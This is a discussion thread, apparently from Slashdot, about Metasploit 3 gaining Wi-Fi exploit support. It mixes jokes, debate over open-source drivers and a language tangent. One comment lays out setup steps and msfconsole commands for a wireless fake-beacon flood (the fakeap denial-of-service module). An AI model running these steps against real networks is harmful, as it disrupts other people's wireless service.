Wi-Fi Exploits Coming to Metasploit

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

Thanks Guys

[99BottlesOfBeerInMyF]

No really, I appreciate all the work that goes into putting this together. I'm sure privately distributed cracking tools already have some of this functionality. Maybe this will get OS vendors to pay a little more attention to wireless security. Wireless is not likely to be widely exploited mechanism for a worm, but it is still something that needs more attention.

Re:Thanks Guys

[solevita]

The tools required for wireless worms have been available to Windows users for some time now, if you know where to look:

Wireless Weapons of Mass Destruction

Re:Thanks Guys

[cmdrbuzz]

Ummm, you realize that Slashcode adds a [nofollow] attribute to your HREF URLs so your comment spamming won't affect anything much.

Except make you look a little silly.

Math problem

W=10.1
F=9.8
i=2673.7

What is Wi-Fi?

Re:Math problem

[richdun]

0.3i

Re:Math problem

Everyone do this and pass it to your friends or you will have bad luck.

Re:Math problem

[dr.badass]

i=2673.7

With Metasploit you can make i = 4456.66

Re:Math problem

For those too lazy to work it out...

Wi-Fi = i(W-F) = 3673.7 ( 0.3) = 802.11

Re:Math problem

I don't have that good of math skills, but I think the answer to your formula is 31337.

Re:Math problem

[Afecks]

Wi-Fi = 802.11 ahhh I see the joke now... humor, how quaint

Re:Math problem

And here I thought it was sqrt(-1).

Although all those engineers like calling that j for some reason.

Re:Math problem

[Grym]

My God! That'd be like 9/11 times 4.8921! We can't allow this to happen!

-Grym

Re:Math problem

[Daxster]

Off-topic, but i = current in amperes for [electrical] engineers. So j is used. 'Course, doesn't help that i, j, and k are unit vectors..

Re:Math problem

With Metasploit you can make i = 4456.66

For the lazy:
W = 10.1
F = 9.8
i = 4456.66

W-F = 0.3
0.3 * i = 1336.99

Clever. But someone needs to get a life.

So.....

[robpoe]

Do I wrap my laptop in tinfoil yet, or not?

Re:So.....

[Anal+Cock]

Even better, wrap the attacker in tin foil. He'll probably need therapy.

This begs the question...

[mohjlir]

Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly? Of course, there is no guarantee that the white hats will find problems before the black hats do, but it exposes flaws more eyeballs.

Re:This begs the question...

[99BottlesOfBeerInMyF]

Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly?

Some of them probably will, but a lot of hardware vendors are reflexively secretive. Others, use the drivers to work around bugs in their products or are embarrassed of the shoddy quality of their code. I'd love the believe that the industry will start to demand open source drivers, but realistically, it is more likely that the OS developer community will have to account for untrusted hardware drivers by seriously re-architecting the way the kernel interacts with drivers.

Re:This begs the question...

[ehrichweiss]

I don't know why others might not release their drivers' source but I know that Broadcomm apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies and needless to say that's not a good thing.

Re:This begs the question...

[cdrguru]

The number one reason this isn't done is the difference between the hardware manufactured by the driver author and the hardware manufactured by slave labor in China is the driver. Period. The chips are nearly a commodity now. There isn't anything unique about that - it is how they are used in the software.

15-20 years ago, it is was the design of the hardware that was where the value was. Today, it is mostly the software running the hardware.

An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business.

Re:This begs the question...

"An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business."

Consumer electronics is commodities period, the driver can't magically turn the card into something else.
Competing in commodities with double the manufacturing cost and expect to stay in business, what are you talking about?

Re:This begs the question...

[scoot80]

Why would any hardware vondor release open source drivers? So that the competition can look at them? I remember someone commenting at another thread asking that firmware for hardware be open sourced too. Hardware vendors might as well then just put all their designs up on display, pack up their stuff and go home.

Re:This begs the question...

[Fred_A]

More generally speaking, with a number of chipsets, you can change a number of parameters through software, notably emission power, sometimes frequency way outside of the extent of what is allowed for WiFi use (as per radio band use regulations).
This is the main reason put forward by the makers for not releasing completely open drivers. If they did their gear couldn't be certified.

Re:This begs the question...

[99BottlesOfBeerInMyF]

Why would any hardware vondor[sic] release open source drivers? So that the competition can look at them?

Why would IBM contribute to an open source OS? So the competition can look at it? IBM is not in the business of selling OS's and by contributing to open source they get both other companies and the open source community to share the labor costs and make a better solution for both IBM and others. Likewise, hardware vendors are not in the business of selling drivers and those drivers could benefit significantly from free contributions and fixes from other companies and the open source community.

I remember someone commenting at another thread asking that firmware for hardware be open sourced too. Hardware vendors might as well then just put all their designs up on display, pack up their stuff and go home.

Apparently you've never heard of OpenFirmware which has for years and continues to power IBM supplied chipsets? Apparently you've not noticed the general trend towards EFI in recent PCs, another open firmware. No, very few companies have any significant intellectual property in their drivers, and those that do are protected by patents. The only real exceptions to this are graphics card manufacturers, whose drivers would probably make apparent all the shortcuts, work-arounds, hacks, and possible patent infringements in their code. There are reasons to keep drivers closed, but most of them are very bad ones from a consumer's perspective.

I'm sure...

[AdmiralWeirdbeard]

...that I speak for a lot of people, based on the low response to this particular gem of posting, when i say:
*blinkblink*
WTF, mate?

Script Kiddies tools for a wide open network

[Gopal.V]

I've played around with metasploit in the past, especially their VNC payloads. The tool seems to have a high likelihood of abuse, compared to a lot of the other security tools (starting from nmap,nessus and all). Except for a couple of courtesy terminals, the tool basically gets you in and gives you a general feeling of being in control.

Canned scripts hardly ever teach you anything, especially when they work out of the box. Making them writing your own exploits is the easiest way to get a script kiddie to learn a bit and grow up (sort of).

another view

could a "broken-in" device (driver) be the new
challenged handshake?
in english: once broken into a bad (wifi) driver
the state the device is in is more secure since it
cannot be "double" hacked???

WEP keys?

So will this make it even easier to get WEP Keys?

You must be a perscriber

[brunes69]

Modern usage

More recently, "begs the question" has been used as a synonym for "invites the question" or "raises the question", or to indicate that "the question really ought to be addressed". In this usage, "the question" is stated in the next phrase. For example: "This year's budget deficit is half a trillion dollars. This begs the question: how are we ever going to balance the budget?" This usage is often sharply criticized by proponents of the traditional meaning, but it has nonetheless come into common use as a result of its use in the media, especially by people ignorant of its original use. Argument over whether this usage should be considered incorrect is an example of the debate between linguistic prescription and description.

Personally I fall srongly on the description side. Perscrition is useful when you are a studentand learning language, but language is a construct for humans to communicate, and as such, description should be the primary motivation for a linguist. Language is how the majority use it, not how scholars define it.

Re:You must be a perscriber

[Dhalka226]

Language is how the majority use it, not how scholars define it.

So I guess "loose" and "lose" are now synonymous..

I just really don't agree. I'm not the kind who generally goes off on people for misusing words as long as I can understand what they're trying to say, but at the same time, words have meanings. The fact that people have no idea how to properly use those words should not change what the words mean. It should just make us exceptionally sad at the state of affairs our communications skills are in.

Incidentally, this is coming from somebody who misused the phrase "begs the question" dozens of times in his life. The difference being, when it was pointed out to me (I forget if somebody said something or I just came across the correct usage one day), I actually made a mental note of it and I have used it properly since then. It wasn't hard. Neither, as my little joke intimated, is using "lose" and "loose" properly. It just takes a little conscious effort at first, and then it will become second nature.

Personally I think we should be getting people to do that rather than pandering to them and altering the meaning of words and phrases once we reach some ignorance threshold.

Re:You must be a perscriber

[onkelonkel]

This is how enormity got to mean "something really big" instead of "a crime beyond all moral boundaries".

Language defined by misuse. Usually done by lackwits in a misguided attempt to sound sophisticated, but ironically it demonstrates instead only their lack of language skills.

These things grate like fingernails on the chalkboard of my soul. Mostly they make me very sad.

Re:You must be a perscriber

[foamrotreturns]

I am very much in agreement. If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing. If I said "That begs the question" 75 years ago, most people would realize that I was calling out the speaker for using a circular argument. Saying "That begs the question" today evokes responses like "What question?" The meaning is nearly lost. We have hundreds of thousands of simple words and phrases that we use to convey much more complex concepts. If we let our language become eroded by the uneducated masses, how will we become educated? We will waste all of our time explaining our ideas in excruciating detail rather than using the previously ubiquitous simplified words and phrases that were crafted to symbolize those very concepts.
Don't use words and phrases for which you haven't learned the meanings!

Re:You must be a perscriber

[udderly]

That depends on what your definition of "is" is. Heh...just kidding.

Re:You must be a perscriber

[trewornan]

If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing

It's not a matter of choice. Languages change over time - they always have and always will. You can argue that this is a bad thing, and you might even be right - but I guarantee you can't stop it.

If you don't like it - tough! Suck it up and stop whining.

Re:You must be a perscriber

[AbRASiON]

Anyways, I could care less about you're opinion your retarted!
p.s did you get them legos for cheap?

(Oh thank god FF2.0 marks "legos" as a spelling mistake and incase you missed it, I thoroughly agree with your post)

Re:You must be a perscriber

[SparcPlug]

...rather than pandering to them...

Based on your reasoning, you never should have come to use the word pandering in this manner.
The origins of pandering:

The plot function of Pandarus in Chaucer's and especially Shakespeare's famous works has given rise to the English words to pander, meaning to further other people's illicit amours, and a pander (in later usage a panderer), a person who does this. The strong pejorative connotations of pander apparently come less from Chaucer's well-meaning young Pandarus than from Shakespeare's cynical uncle figure who concludes the play's epilogue by wishing upon the audience all his many diseases. A panderer is, specifically, a bawd -- a male who arranges access to female sexual favors, the manager of prostitutes. Thus, in law, the charge of pandering is an accusation that an individual has sold the sexual services of another.

Your argument is that simply because his use of the phrase does not conform to it's traditional use it is not valid. My response to you is that if linguistic constructions were never allowed to take on new meaning, you would never have thought to use pandering as it traditionally denoted something other than 'to appeal to'.

IMO, this is not the way to go about using language. Truthfully, if one intended to denote circular reasoning there are much more obvious ways to do this. Actually saying 'circular reasoning' would for example be more concise.

So where is the code? Right here.

[spinja]

Install the latest Lorcon snapshot:
$ http://www.802.11mercenary.net/lorcon/

Grab the latest version of metasploit 3:
$ svn co http://metasploit.com/svn/framework3/trunk/

Compile the Metasploit Lorcon wrapper:
$ cd trunk/external/msflorcon
$ make

Plug in a support network card (I use a WPN511 with the madwifi-old driver in Gentoo)

Load the Metasploit Console (as root, since it needs raw WiFi access)
# trunk/msfconsole

Play with some of the demo modules :-)

This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
msf > use auxiliary/dos/wireless/fakeap
msf auxiliary(fakeap) > show options

Module options:

      CHANNEL 11 yes The default channel number
      DRIVER madwifi yes The name of the wireless driver for lorcon
      INTERFACE ath0 yes The name of the wireless interface

Type the "run" command, or use "set VARIABLE VALUE" to change these options.

msf auxiliary(fakeap) >run

Re:So where is the code? Right here.

[towsonu2003]

sounds to me like it needs a GUI ;)

Re:So where is the code? Right here.

[slack_prad]

As a matter of fact, it does: a web console (but it is not that stable)

At least now we can know...

[Cid+Highwind]

Hopefully now that the code is out there, someone independent (not Ellch and not a Mac blogger) will test this exploit on an out-of-the-box MacBook, and see if the hole lives up to the hype.

pleeze uze fonetix

It is the only spelling and grammar combination that actually makes sense

so..

luse

thare

itz

This explains my recent Trojan infection

[mhackarbie]

I recently removed a nasty trojan (a member of the 'Wareout' family) from my laptop, with the aid of the free Sophos Anti-Rootkit and fantastic free technical support from the great folks at the spybot forums. My best guess was that I got the infection when I logged into a free wifi connection at a local cafe. I saw a brief message from my antivirus software that a trojan had been detected, but afterwards, it reported nothing. After reading the eweek article, I learned that my Intel Pro/Wireless driver had major security vulnerabilities. I just downloaded the update and hopefully will be malware-free for a little while. So much precious time development time was wasted because of this infection!

How is this a good thing?

[AaronLawrence]

Proof of concept exploits, are one thing, arguably useful. But helpfully integrating them into a tool script kiddies can use is just wrong. This is the kind of thing that makes computer security an ongoing nightmare.

Re:How is this a good thing?

[azemute]

Because acceptance of the fact that there *is* a problem is the first step on the road to solving that problem. A whole mob of scriptkiddies get their hands on this, and someone is bound to take notice. Maybe not now, but in the near future. Until that happens, and it gets some spotlight coverage, no one is going to even recognize wireless as a security threat.

Just pretending that the problem doesn't exist, doesn't make the problem go away.

Re:How is this a good thing?

You're missing the point of the tool ...

A bulldozer in the hands of a trained professional and enhance the productivity of a construction crew tenfold. That same machinery in the hands of an amateur can destroy an entire city block. Risk is something we must tolerate in all aspects of life in exchange for progress.

While somewhat dangerous, Metasploit exists as a tool for security professionals. Providing analysts and pen-testers with an automated, extendable framework for managing and deploying their tools can enhance their productivity. I would hope that the ultimate benefits provided by the tool to the security community surpass the limited threat posed by the "wrong people" playing with the software.